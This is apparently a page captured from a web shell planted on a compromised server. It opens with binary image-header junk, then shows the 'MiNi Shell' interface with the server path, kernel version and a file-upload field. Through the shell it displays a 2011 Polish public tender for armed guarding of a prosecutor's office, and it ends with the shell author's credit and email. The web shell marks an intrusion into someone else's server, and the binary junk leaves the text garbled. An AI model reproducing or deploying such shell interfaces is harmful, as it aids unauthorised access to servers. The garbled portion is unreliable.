JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/116175-N-2011.html

<p class="kh_header"><b>Ostrów Wielkopolski: Usługa w zakresie ochrony obiektu, mienia i osób na terenie budynku Prokuratury Okręgowej w Ostrowie Wielkopolskim, ul. Krotoszyńska 37.</b><br>
<b>Numer ogłoszenia: 116175 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Ostrowie Wielkopolskim , ul. Krotoszyńska 37, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5918415, faks 062 5928165.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrow.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie ochrony obiektu, mienia i osób na terenie budynku Prokuratury Okręgowej w Ostrowie Wielkopolskim, ul. Krotoszyńska 37..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 


	Przedmiotem zamówienia jest wykonywanie usługi w zakresie ochrony obiektu, mienia i osób na terenie budynku Prokuratury Okręgowej w Ostrowie Wielkopolskim, ul. Krotoszyńska 37 - budynek pięciokondygnacyjny o powierzchni użytkowej 2.246m2 oraz garaż o powierzchni 98,10m2
Usługobiorca zobowiązuje się do wykonywania usługi:
a)	od godz. 700 do 1600 przez  dwóch uzbrojonych w broń palną bojową, środki przymusu bezpośredniego umundurowanych pracowników ochrony w dni robocze Zamawiającego, od 1600 do 700 przez jednego uzbrojonego w broń palną bojową, środki przymusu bezpośredniego umundurowanego pracownika ochrony w każdy dzień roboczy, 
b)	w dni wolne i ustawowo wolne od pracy od 700 do 700 dnia następnego przez jednego uzbrojonego w broń palną bojową, środki przymusu bezpośredniego  umundurowanego pracownika ochrony, 
c)	zgodnie z powszechnie obowiązującymi w tym zakresie przepisami oraz wewnątrzzakładowymi zarządzeniami obowiązującymi u Zamawiającego
d)	wszyscy pracownicy ochrony  muszą mieć dostęp do informacji niejawnych, przynajmniej o klauzulach zastrzeżone oraz odbyć przeszkolenie z zakresu ochrony informacji niejawnych na koszt Wykonawcy. Wykonawca musi poinformować Zamawiającego w przypadku zmiany na danym stanowisku pracownika ochrony, celem uzupełnienia wszelkiej dokumentacji dotyczącej nowego pracownika, np. dostępu do informacji niejawnych, czy przeszkolenia z zakresu informacji niejawnych. Wykonawca musi zapewnić zastępstwo pracownika ochrony  w przypadku urlopu czy zwolnienia chorobowego pracownika. W/w musi posiadać podobne uprawnienia jak pracownik stanu stałego.
e)	Wykonawca zobowiązany jest posiadać centrum monitoringu najpóźniej do 3 dni przed rozpoczęciem wykonywania umowy. 
- Wykonawca zobowiązany jest do zachowania w tajemnicy wszystkich wiadomości uzyskanych podczas wykonywania czynności ochrony.
- Wykonawca nie może powierzać osobom trzecim świadczenia usługi ochrony obiektu i mienia Zamawiającego. 
- Wykonawca zobowiązany jest do opracowania planu ochrony.

Zakres czynności i obowiązków dla pracownika ochrony: 
-	wszechstronna znajomość przepisów dotyczących chronionego obiektu,
-	dbałość o przydzielone wyposażenie,
-	pełnienie ochrony zgodnie z grafikiem, a w razie nie stawienia się zmiennika powiadomienie Zamawiającego oraz Wykonawcy o zaistniałym fakcie z jednoczesnym pozostaniem na posterunku do czasu przybycia zmiennika,
-	informowanie przełożonego oraz przedstawiciela Prokuratury o zaistniałych zdarzeniach w chronionym obiekcie,
-	każdorazowe przyjmowanie i zdawanie ochrony potwierdzeniem wpisu do Dziennika Zmiany oraz Książki wydawania broni i amunicji,
-	zachowanie w tajemnicy wszystkich informacji dotyczących Prokuratury i chronionego obiektu.
-	sprawdza każdorazowo stan zabezpieczeń drzwi oraz kontroluje pomieszczenia w chronionym budynku,
-	zamyka i otwiera drzwi wejściowe do biurowca o ustalonych godzinach,
-	pełni służbę obchodową w chronionym obiekcie 
-	w czasie pełnienia czynności ochronnych nie zezwala na przebywanie w pomieszczeniu ochrony osobom postronnym,
-	przyjmuje i przechowuje klucze do pomieszczeń biurowych oraz dokonuje ich ewidencjonowanie do książki ewidencji kluczy,
-	w przypadku zauważenia pożaru natychmiast przystępuje do akcji ratunkowej 
i alarmuje straż pożarną, policję, kierownictwo chronionego obiektu, a także zabezpiecza obiekt przed dalszymi skutkami wypadku,
-	przestrzega przepisów BHP i ppoż. oraz utrzymuje należyty porządek w zajmowanym pomieszczeniu ochrony, 
-	w trakcie pełnienia służby nie dłużej niż co dwie godziny melduje do centrum monitorowania powiadamiając o stanie bezpieczeństwa obiektu.
Ponadto pracownik ochrony musi:
-	posiadać znajomość struktury Prokuratury oraz poszczególnych jej działów celem właściwego reagowania na negatywne zjawiska godzące w interes Prokuratury w Ostrowie Wielkopolskim,
-	dbać o przydzielone wyposażenie,
-	reagować na wszelkie zjawiska niszczenia i uszkadzania mienia Zamawiającego,
-	posiadać znajomość zarządzeń wewnętrznych obowiązujących w Prokuraturze związanych z ochroną i zabezpieczeniem mienia, przepisów dotyczących chronionego obiektu, instrukcji ppoż. oraz głównych wyłączników prądu, sieci wodno - kanalizacyjnej,
-	utrzymywać stały kontakt z pracownikiem wskazanym przez Zamawiającego w celu wspólnych przedsięwzięć zmierzających do likwidacji wszelkich nieprawidłowości,
-	prowadzić dokumentację :
a)	dziennik zmiany, w którym należy odnotowywać wszelkie wydarzenia, polecenia przełożonych i Zleceniodawcy
b)	książki wydawania-przyjmowania broni i amunicji
c)	książki ewidencji kluczy w strefie bezpieczeństwa
d)	książki ewidencji kluczy od pomieszczeń służbowych i działów Prokuratury
e)	dziennika zmiany
f)	dziennika wydarzeń
g)	książki ewidencji wydawanych przepustek
h)	książki stanu uzbrojenia
i)	książki depozytów broni i amunicji
j)	książki kwitów depozytowych
k)	planu ochrony obiektu
- patrolować rejon budynku Prokuratury przy ul. Krotoszyńskiej 37 zwracając szczególną uwagę na :
a)	fizyczne zabezpieczenia pomieszczeń służbowych, magazynowych, zaparkowanych pojazdów służbowych oraz właściwe ich zabezpieczenie, 
b)	zabezpieczenia fizyczne terenu (ogrodzenia, bramy, wejścia itp.), 
c)	w zakresie przestrzegania dyscypliny pracy - nie dopuszczanie do przebywania na terenie obiektu i w jego pobliżu osób nietrzeźwych, spożywających alkohol, zakłócających porządek pracy itp., 
d)	w razie ujawnienia nieprawidłowości, niezwłoczne powiadamianie kierowników poszczególnych komórek, przedstawiciela Zamawiającego, a w razie ujawnienia przestępstw i wykroczeń - udokumentowanie zdarzenia i w razie potrzeby wezwanie na miejsce Policji. 
Wykonawca w terminie najpóźniej do 3 dni przed rozpoczęciem wykonywania umowy instaluje na swój koszt urządzenie kompatybilne z zainstalowanym systemem alarmowym w budynku zamawiającego.
Ustawa z dnia 22 sierpnia 1997 r. o ochronie osób i mienia - art. 3 (Dz.U. nr 145 z 2005 r.)
Ustawa z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych - art. 46 (Dz.U. nr 182 poz. 1228 z 2010 r.)

Szczegółowy tryb działań pracowników ochrony:
Podstawa prawna : art. 36 ust. 5 ustawy z dnia 22.08.1997 r. o ochronie osób i mienia (teks jednolity Dz.U. 2005 nr 145 poz. 1221)
1)	ustalanie uprawnień osób do przebywania na obszarze chronionym,
2)	wzywanie osób do opuszczenia obszaru chronionego w przypadku stwierdzenia braku uprawnień do przebywania na tym terenie,
3)	ujęcie osób stwarzających w sposób oczywisty bezpośrednie  zagrożenie dla życia i zdrowia ludzkiego, a także chronionego mienia w celu niezwłocznego oddania tych osób Policji;
Pracownik ochrony, na żądanie osoby, w stosunku do której podjął czynności wyżej określone, zobowiązany jest :
a)	podać swoje imię i nazwisko oraz dokument identyfikacyjny, potwierdzający uprawnienia do podjęcia czynności,
b)	podać podstawę prawną i przyczynę kontroli - czynności,
c)	z dokonanych czynności legitymowania, zastosowania środków przymusu bezpośredniego (na warunkach określonych w Rozporządzeniu Rady Ministrów  z dnia 30 czerwca 1998 roku w sprawie szczegółowych warunków i sposobów użycia przez pracowników ochrony środków przymusu bezpośredniego (Dz. U. Nr 89, poz. 563), sporządzić szczegółową notatkę służbową, w której należy podać :
-	dane personalne osoby,
-	datę, godzinę i miejsce zdarzenia,
-	przyczynę podjęcia czynności,
-	datę i godzinę poinformowania oraz przekazania osoby Policji, a także informację o udzieleniu pomocy przedlekarskiej i jej zakresie.
W przypadku ujawnienia osób nietrzeźwych lub spożywających alkohol na terenie chronionego obiektu należy wezwać Policję celem zbadania na zawartość alkoholu 
i udokumentować czynności j. w. 
4)	sprawdzanie stanu fizycznego zabezpieczenia chronionych obiektów, pojazdów a także miejsc zagrożonych pożarem lub narażonych na zniszczenie lub uszkodzenie;
Ujawnione przypadki nieprawidłowości należy niezwłocznie opisywać w Dzienniku Zmiany, dążąc do niezwłocznego naprawienia nieprawidłowości, a chronione mienie zabezpieczyć do chwili przybycia odpowiednich osób.
5)	występowanie w ubiorze służbowym z identyfikatorem,
6)	udzielanie pomocy przedlekarskiej osobie, która ma widoczne obrażenia ciała lub utraciła przytomność, a w razie potrzeby wezwanie pomocy lekarskiej,
7)	nie opuszczanie terenu chronionego do chwili otrzymania zmiany,
8)	przekazywanie wszelkich ujawnionych nieprawidłowości zmiennikowi, a także potwierdzanie stanu faktycznego przyjęcia pod ochronę obiektów,
Wykonawca zobowiązany jest posiadać system łączności gwarantujący przybycie na miejsce grupy interwencyjnej w ciągu maks. 10 min. od momentu uruchomienia alarmu.
      10) pracownicy ochrony muszą posiadać minimum Licencje Pracownika Ochrony Fizycznej I Stopnia oraz posiadać legitymację osoby dopuszczonej do posiadania broni.
Ponadto Dowódca zmiany powinien posiadać Licencję Pracownika Ochrony Fizycznej II Stopnia.

W zakres czynności Wykonawcy wchodzi również:
- ochrona pomieszczenia - garażu-o powierzchni 98,10m2 - mieszczącego się na terenie Zamawiającego. Zamawiający nie wymaga fizycznej całodobowej ochrony garażu. Zamawiający zastrzega sobie, iż powiadamianie o ewent. próbach wtargnięcia lub o alarmie ppoż. - na terenie garażu-  będzie sygnalizowane do centrum ochrony za pomocą systemu powiadamiania alarmowego-telefonicznego. W momencie zaistniałej w/w sytuacji  - uaktywnienie się alarmu - ochrona powiadamia o zaistniałym fakcie grupę interwencyjną, która musi przybyć na miejsce zdarzenia. 
-	Firma odpowiada za powstałe szkody obiektu chronionego w przypadku nie dopełnienia swoich obowiązków, kradzieży i innych zdarzeń.
-	Firma ochroniarska odpowiada materialnie w stosunku do osób trzecich z tytułu ewentualnych szkód wynikłych z interwencji z naruszeniem przepisów.
     
Termin wykonania umowy: od 01.06.2011 r. do 31.05.2014  r.

Wykonawca i jego pracownicy zobowiązani są do zachowania w tajemnicy wszystkich informacji dotyczących prokuratury. 
Zamawiający nie dopuszcza składanie ofert częściowych.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówienia publicznego w dynamicznym systemie zakupów.
Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie koncesji wydanej przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iż wykonanie lub wykonywanie przez wykonawcę ubiegającego się o udzielenie zamówienia, minimum 5 usług o wartości 300.000,00 zł. brutto każda, odpowiadających swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia w okresie 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, spełnia warunek posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iż posiadanie przez Wykonawcę opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego  że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00 zł. spełnia warunek dotyczący sytuacji ekonomicznej i finansowej Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>poświadczenie bezpieczeństwa pracowników przewidzianych do wykonywania usługi ochrony obiektu, mienia i osób.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrow.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Ostrowie Wielkopolskim
ul. Krotoszyńska 37
63-400 Ostrów Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 08:00, miejsce: Miejsce i termin składania ofert:
Miejsce złożenia - bezwzględnie biuro podawcze Zamawiającego w godz. 7:30-15:30.
Termin złożenia - do  26 kwietnia 2011 r. do godz. 8:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com